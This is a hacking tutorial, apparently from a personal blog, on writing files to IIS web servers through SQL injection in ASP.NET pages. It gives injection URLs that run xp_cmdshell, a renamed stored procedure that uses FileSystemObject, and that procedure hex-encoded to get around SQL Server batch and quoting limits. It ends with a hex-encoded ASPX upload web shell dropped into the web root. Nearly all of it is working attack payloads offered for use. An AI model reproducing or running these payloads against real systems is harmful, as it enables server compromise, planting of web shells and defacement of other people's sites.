In the Name of ALLAH the most beneficent and the Merciful

It was a myth for me to upload files on IIS servers, when the user is admin and we have the path also. There are ways to write files with xp_cmdshell but that is not enabled on every SQL Server due to security reasons and also not enabled by default. After i read these articles

I knew there is a way to write files even when xp_cmdshell is not enabled. In this article I will show you both ways of writing files.

1. With xp_cmdShell

It is pretty easy when u have access to xp_cmdShell

First create file with

site.com/page.aspx?id=1;exec master..xp_cmdshell ‘type nul>path/filename.ext’– -

eg

site.com/page.aspx?id=1;exec master..xp_cmdshell ‘type NUL>D:\sites\site.com\httpdocs\rummykhan.txt’– -

it will create an empty file. Now we need to write contents into the file.

site.com/page.aspx?id=1;exec master..xp_cmdshell ‘echo rummykhan was here!!>D:\sites\site.com\httpdocs\rummykhan.txt’– -

And you’re done, file is written on server .

2. With File System Objects

here is complete Procedure Code which i used

  • https://www.simple-talk.com/code/WorkingWithFiles/spWriteStringTofile.txt (by Phil Factor)

I just customized this for my need to avoid url length problem and it became something like this


	
Short Code, jux renamed variable and remove errors syntax, as we dont need those during SQL Injection

CREATE PROCEDURE FcUk(@st Varchar(max),@p VARCHAR(255),@fn VARCHAR(100)) AS DECLARE @ofs int,@ots int,@oeo int,@sem Varchar(1000),@cmd varchar(1000),@hr int,@fnp varchar(80) set nocount on select @sem='o' EXECUTE @hr = sp_OACreate 'Scripting.FileSystemObject', @ofs OUT Select @fnp=@p+'\'+@fn if @HR=0 Select @oeo=@ofs , @sem='Creating file "'+@fnp+'"' if @HR=0 execute @hr = sp_OAMethod @ofs,'CreateTextFile',@ots OUT,@fnp,2,True if @HR=0 Select @oeo=@ots, @sem='wttf "'+@fnp+'"' if @HR=0 execute @hr = sp_OAMethod @ots, 'Write', Null, @st if @HR=0 Select @oeo=@ots, @sem='ctf "'+@fnp+'"' if @HR=0 execute @hr = sp_OAMethod @ots, 'Close' if @hr<>0 begin Declare @Source varchar(255),@Description Varchar(255),@Helpfile Varchar(255),@HelpID int EXECUTE sp_OAGetErrorInfo @oeo, @source output,@Description output,@Helpfile output,@HelpID output end EXECUTE sp_OADestroy @ots EXECUTE sp_OADestroy @ots

I Just cut-short the variable names and remove error syntax because we dont need these while injection.

At first when testing i wrote the same proc in url, like

site.com/page.aspx?id=1;proc syntax here– -

CREATE/ALTER PROCEDURE’ must be the first statement in a query batch

This is due to restriction in T-SQL that CREATE PROC must be the first statement when u execute a batch of queries.

So to avoid this i used the EXEC( ) Function, i hex encoded the complete proc, and gave that to the EXEC( ‘Complete proc in hex’ ) and voila this worked like a charm and created the Store Procedure in SQL Server.

Here is the final syntax for creating the Store Procedure on SQL Server. I hex encoded to avoid any exception from SQL Server about quotation and to run things smoothly.

begin
declare @x varchar(MAX)
SET @x = 0x4352454154452050524f434544555245204663556b284073742056617263686172286d6178292c4070205641524348415228323535292c40666e20564152434841522831303029294153204445434c4152452020406f667320696e742c406f747320696e742c406f656f20696e742c4073656d20566172636861722831303030292c40636d6420766172636861722831303030292c40687220696e742c40666e70207661726368617228383029736574206e6f636f756e74206f6e2073656c656374204073656d3d276f27204558454355544520406872203d2073705f4f41437265617465202027536372697074696e672e46696c6553797374656d4f626a656374272c20406f6673204f55542053656c6563742040666e703d40702b275c272b40666e206966204048523d302053656c65637420406f656f3d406f6673202c204073656d3d274372656174696e672066696c652022272b40666e702b272227206966204048523d30206578656375746520406872203d2073705f4f414d6574686f6420406f66732c274372656174655465787446696c65272c406f7473204f55542c40666e702c322c54727565206966204048523d302053656c65637420406f656f3d406f74732c204073656d3d27777474662022272b40666e702b272227206966204048523d30206578656375746520406872203d2073705f4f414d6574686f642020406f74732c20275772697465272c204e756c6c2c20407374206966204048523d302053656c65637420406f656f3d406f74732c204073656d3d276374662022272b40666e702b272227206966204048523d30206578656375746520406872203d2073705f4f414d6574686f642020406f74732c2027436c6f736527206966204068723c3e3020626567696e204465636c6172652040536f75726365207661726368617228323535292c404465736372697074696f6e205661726368617228323535292c4048656c7066696c65205661726368617228323535292c4048656c70494420696e7420455845435554452073705f4f414765744572726f72496e666f2020406f656f2c2040736f75726365206f75747075742c404465736372697074696f6e206f75747075742c4048656c7066696c65206f75747075742c4048656c704944206f757470757420656e642045584543555445202073705f4f4144657374726f7920406f747320455845435554452073705f4f4144657374726f7920406f7473;
EXEC(@x)
end

And we can use it like

site.com/page.aspx?id=1;above syntax here — -

The above Query will create a Store Procedure named FcUk which take 3 param,

1.     File Contents

2.     Full Path

3.     File Name

Now the next thing is to excute that proc, to execute this proc

site.com/page.aspx?id=1; exec FcUk ‘file contents here.’,’Full path’,’file name’– -

eg

site.com/page.aspx?id=1; exec FcUk ‘rummykhan was here!!’,’D:\sites\site.com\httpdocs\’,’rummykhan.txt’– -

now access the file and enjoy.

A tiny Uploader to avoid url length problem

begin declare @x varchar(MAX) SET @x=0xfeff3c25402050616765204c616e67756167653d224323222044656275673d2266616c7365222074726163653d2266616c7365222076616c6964617465526571756573743d2266616c73652220456e61626c655669657753746174654d61633d2266616c73652220456e61626c655669657753746174653d227472756522253e3c7363726970742072756e61743d22736572766572223e70726f74656374656420766f69642075706c5f436c69636b286f626a6563742073656e6465722c204576656e7441726773206529207b7472797b6966202866752e48617346696c65297b66752e536176654173285365727665722e4d61705061746828222e2229202b225c5c222b2053797374656d2e494f2e506174682e47657446696c654e616d652866752e46696c654e616d6529293b526573706f6e73652e577269746528225375636365737322293b7d7d63617463687b526573706f6e73652e577269746528224661696c656422293b7d7d203c2f7363726970743e3c666f726d2069643d22666f726d31222072756e61743d22736572766572223e3c6173703a46696c6555706c6f61642049443d226675222072756e61743d2273657276657222202f3e3c6173703a427574746f6e2049443d2275706c222072756e61743d227365727665722220546578743d2255706c6f616422204f6e436c69636b3d2275706c5f436c69636b22202f3e3c2f666f726d3e  exec FcUk @x,’path here’,’filename’ end

use this syntax like

site.com/page.aspx?id=1;above uploader syntax here– -

and access it and upload your file manager.

POC

Original Video : http://youtu.be/DtWRQG0BaMI

Article By : Rummy Khan (fb/rummykhan)